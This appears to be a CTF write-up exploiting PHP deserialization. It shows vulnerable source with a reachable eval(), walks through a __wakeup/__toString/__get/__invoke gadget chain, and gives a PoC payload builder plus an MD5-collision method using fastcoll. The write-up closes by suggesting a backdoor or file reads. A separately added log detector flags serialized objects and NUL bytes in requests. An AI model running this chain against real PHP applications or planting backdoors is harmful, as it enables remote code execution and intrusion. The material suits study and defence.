PHP deserialization +md5 collision
2022-07-05 20:49:00 【Game programming】
Source code:

```php
<?php
error_reporting(0);
highlight_file(__FILE__);

class Backdoor {
    public $x;
    public $y;
    public function __invoke(){
        if( is_string($this->x) && is_string($this->y) && ($this->x != $this->y) && (md5($this->x) === md5($this->y)) ){
            if(!preg_match("/\<\?/", $this->x, $match)){
                eval($this->x);
            } else {
                die("No Way!");
            }
        } else {
            die("Keep it up......");
        }
    }
}

class Entrance{
    public $name;
    public $str;
    public function __construct(){
        $this->name = "Bunny";
    }
    public function __toString(){
        return $this->str->name;
    }
    public function __wakeup(){
        echo 'Welcome, '.$this->name."<br>";
    }
}

class Test{
    public $z;
    public function __construct(){
        $this->z = array();
    }
    public function __get($key){
        $function = $this->z;
        return $function();
    }
}

if (isset($_GET['poc'])){
    unserialize($_GET['poc']);
}
?>
```
Analysis:
First, from the call to unserialize() it is obvious that this is a PHP deserialization problem. Problems of this kind usually require finding an entry point first.
After going through the code, we quickly find a PHP magic method, __wakeup().
__wakeup():
unserialize() checks whether the class has a __wakeup() method. If it does, __wakeup() is called first.
Although this method only outputs a sentence, a closer look shows that right above __wakeup() there is another magic method, __toString().
__toString():
The method that responds when an object of the class is treated as a string, for example what `echo $obj;` should display.
From this we can guess that if we assign an object of this class to $this->name, __toString() will be triggered when the name is concatenated into the welcome string.
Look closer at the body of __toString: it returns $this->str->name. From this we can guess that we assign an object to $this->str and then read that object's name property.
Looking back at the source, we find that the Test class has a __get() magic method.
__get():
In PHP, __get() is called when reading a member variable of a class that is not accessible from the calling scope.
In PHP object-oriented programming, once a member property of a class is declared private, trying to access it from outside produces a "Cannot access private property" error. To get around that, the class can use the magic method __get().
Combining the steps above, we can add a private variable name to the Test class, so that __get() is triggered when that private variable is read.
Look again at the body of __get(): it returns $function(), where $function = $this->z. Here it is natural to think of calling an object as a function, and checking the code we find the __invoke() magic method.
__invoke():
__invoke() is the method that responds when an object is called as a function.
**Effect:** when you try to call an object as if it were a function, __invoke() is called automatically.
**Note:** this feature is only available in PHP 5.3.0 and above.
The __invoke() magic method here applies a filter: x and y must both be strings, their values must not be equal, yet their MD5 values must be identical (the comparison is a strict ===, so the two digests have to be byte-for-byte the same), and x must not contain `<?`. Finally it executes x as PHP code, which is the eval() function we will ultimately exploit!
That is roughly the whole process. If you cannot see it directly, you can also work backwards: find the places that could be used and trace from them back to the entry point.
Answer:
Construct the PoC chain:
```php
<?php
class Entrance{
    public $name;
    public $str;
}
class Test{
    public $z;
    private $name;
}
class Backdoor {
    public $x;
    public $y;
}
$a=new Entrance();
$b=new Test();
$c=new Backdoor();
$a->name=$a; // used to trigger __toString
$a->str=$b;  // used to trigger __get
$b->z=$c;    // used to trigger __invoke
$c->x=file_get_contents("1_msg1.txt");
$c->y=file_get_contents("1_msg2.txt");
echo urlencode(serialize($a)); // the plaintext output contains invisible characters, so remember to URL-encode it
?>
```
The chain itself is not difficult; it takes just three steps. The hard part of this challenge is the MD5 collision at the end: finding two strings with the same MD5 value is not hard, but those strings also have to be executed as PHP code, which is not so easy.
Trying candidates one by one is clearly not going to work, so here we have to use the tool fastcoll.
Download resources:
Program: http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
Source code: http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip
This tool works as follows: you give it a string, and it outputs two files that both contain that string and have the same MD5 value. With this tool the challenge becomes very simple.
Let's do a quick test: use PHP code to output 99999.
First prepare a file 1.txt whose content is
echo 999999;
Drag the file onto fastcoll.exe and the program will automatically generate two files.
Looking at the output, the code is followed by a lot of garbled bytes, so we can put a comment marker after the original content. Modify 1.txt to
echo 999999;//
Feed it to fastcoll again and two files are generated. Because these files contain garbled (binary) bytes, it is recommended to use file_get_contents to read their contents.
[Figure 1]
Test result:
[Figure 2]
With that, the eval function has executed successfully. Finally you can try to leave a backdoor, or read files directly.
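A detection-side companion, added here and not part of the original write-up: it inspects the query string of an access-log line for the marks this chain leaves, the serialized-object tokens O:len:"Class" and the NUL bytes that delimit private/protected property names (the "invisible characters" the PoC has to URL-encode). The combined-style log lines are constructed, with the Backdoor x and y fields replaced by N.

```php
<?php
// Added example, not from the original write-up: a detector that inspects the
// query string of an access-log line for the marks of this gadget chain, the
// serialized-object tokens O:len:"Class" and the NUL bytes that delimit
// private/protected property names (the "invisible characters" the PoC had to
// URL-encode). The log lines below are constructed; x and y are set to N.
declare(strict_types=1);

/** Returns a list of findings for one log line, or [] if nothing suspicious. */
function inspect_request(string $logLine): array
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $logLine, $m)) {
        return [];
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    parse_str($query, $params); // URL-decodes, so %00 becomes a real NUL byte
    $findings = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;
        }
        if (preg_match_all('/O:\d+:"([\w\\\\]+)"/', $value, $classes)) {
            $findings[] = "$name: serialized objects " . implode(',', $classes[1]);
        }
        if (strpos($value, "\0") !== false) {
            $findings[] = "$name: NUL byte (private/protected property marker)";
        }
    }
    return $findings;
}

// Constructed sample: one benign request, then the chain from this write-up.
$sampleLog = [
    '10.0.0.5 - - [05/Jul/2022:20:49:00 +0800] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Jul/2022:20:50:13 +0800] "GET /index.php?poc=O%3A8%3A%22Entrance%22%3A2%3A%7B'
    . 's%3A4%3A%22name%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22z%22%3B'
    . 'O%3A8%3A%22Backdoor%22%3A2%3A%7Bs%3A1%3A%22x%22%3BN%3Bs%3A1%3A%22y%22%3BN%3B%7D'
    . 's%3A10%3A%22%00Test%00name%22%3BN%3B%7D%7D HTTP/1.1" 200 77',
];
foreach ($sampleLog as $line) {
    foreach (inspect_request($line) as $finding) {
        echo "ALERT $finding\n";
    }
}
```

Only the second line produces alerts, one naming the three classes and one for the NUL byte; a WAF or log pipeline can apply the same two checks to any parameter that reaches unserialize().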
Author: Sentry_fei